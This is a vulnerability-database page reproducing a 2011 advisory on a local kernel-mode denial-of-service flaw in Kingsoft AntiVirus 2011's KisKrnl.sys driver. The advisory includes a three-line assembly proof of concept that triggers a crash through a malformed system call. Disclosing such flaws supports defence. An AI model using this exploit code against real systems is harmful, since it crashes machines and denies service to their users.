Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:25507
HistoryJan 19, 2011 - 12:00 a.m.

Kingsoft AntiVirus 2011 SP5.2 KisKrnl.sys <= 2011.1.13.89 Local Kernel Mode D.O.S Exploit(3 lines of code)

2011-01-1900:00:00
vulners.com
17
JSON

Kingsoft AntiVirus 2011 SP5.2 KisKrnl.sys <= 2011.1.13.89 Local Kernel Mode

D.O.S Exploit

Date: 2011-1-16

Author: MJ0011

Version: KingSoft AntiVirus 2011 SP5.2 with KisKrnl.sys <=2011.1.13.89

Tested on: Windows XP SP3

DETAILS:
KisKrnl.sys hook the kernel function KiFastCallEntry , but is not correctly handle
user stack pointer

EXPLOIT CODE:

__asm
{
mov edx , 0x80000000
mov eax , 0x101 ;id of NtTerminateProcess under Windows XP
int 0x2e
}

JSON